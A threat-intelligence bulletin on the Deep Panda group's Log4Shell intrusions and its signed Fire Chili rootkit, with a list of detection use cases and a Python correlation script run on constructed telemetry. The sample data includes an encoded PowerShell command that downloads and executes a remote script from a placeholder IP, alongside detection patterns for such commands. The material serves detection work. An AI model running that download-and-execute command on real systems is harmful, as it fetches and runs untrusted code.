April 05, 2022

Deep Panda & Fire Chili Rootkits

Industry: Academic, Cosmetic, Financial, Travel | Level: Tactical | Source: Fortinet

Researchers at FortiGuard Labs have identified the Chinese APT group Deep Panda exploiting the Log4Shell vulnerability and deploying a new digitally signed rootkit dubbed Fire Chili. The signing certificates were stolen from game development companies Frostburn Studios and the Korean 433CCR Company. The attack chain begins with a Log4Shell exploit against a vulnerable VMware Horizon server, which spawns an encoded PowerShell command to download and execute scripts and ends with a malicious DLL being installed. Persistence is achieved by creating a service and a registry entry. At the time of writing, the Fire Chili rootkit scores low on VirusTotal.

  • Anvilogic Scenario: Deep Panda – Fire Chili Threat Campaign – Initial Attack Stage
  • Anvilogic Use Cases:
    • Potential CVE-2021-44228 – Log4Shell
    • Encoded Powershell Command
    • Executable File Written to Disk
    • Download exe|msi|bat Proxy
    • Executable Create Script Process
    • Rare remote thread
    • Windows Service Created
    • Suspicious Registry Key Created
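As an added illustration, not Fortinet's or Anvilogic's own detection content, the Python below correlates three of the stages the use cases above name on constructed telemetry: an encoded PowerShell download-and-execute command, followed by a service creation and a registry entry on the same host within a short window. The event field names, hostnames, URL and timestamps are assumptions.

```python
import base64
import re
from datetime import datetime, timedelta

# Constructed sample telemetry with assumed field names; not real Fire Chili data.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/s.ps1')"
    .encode("utf-16-le")).decode()
EVENTS = [
    {"host": "horizon01", "ts": "2022-04-05T10:00:00", "type": "process",
     "cmdline": f"powershell.exe -nop -w hidden -EncodedCommand {ENCODED}"},
    {"host": "horizon01", "ts": "2022-04-05T10:02:30", "type": "service_created"},
    {"host": "horizon01", "ts": "2022-04-05T10:02:31", "type": "registry_set"},
    {"host": "web02", "ts": "2022-04-05T11:00:00", "type": "process",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
]

# PowerShell accepts abbreviated forms of -EncodedCommand; the payload is UTF-16LE base64.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
DOWNLOAD_EXEC = re.compile(r"DownloadString|DownloadFile|Invoke-Expression|\bIEX\b", re.I)

def decode_encoded_powershell(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent/undecodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def correlate(events, window=timedelta(minutes=10)):
    """Per host: encoded download-and-execute PowerShell, then service + registry within window."""
    hits, by_host = [], {}
    for e in sorted(events, key=lambda e: e["ts"]):  # ISO timestamps sort lexically
        by_host.setdefault(e["host"], []).append(e)
    for host, evs in by_host.items():
        for i, e in enumerate(evs):
            if e["type"] != "process":
                continue
            decoded = decode_encoded_powershell(e["cmdline"])
            if not decoded or not DOWNLOAD_EXEC.search(decoded):
                continue
            start = datetime.fromisoformat(e["ts"])
            later = [x for x in evs[i + 1:]
                     if datetime.fromisoformat(x["ts"]) - start <= window]
            stages = {x["type"] for x in later}
            if {"service_created", "registry_set"} <= stages:  # all persistence stages seen
                hits.append({"host": host, "start": e["ts"], "decoded": decoded})
    return hits
```

Running `correlate(EVENTS)` flags only `horizon01`; the plain `-File` invocation on `web02` never decodes and is ignored.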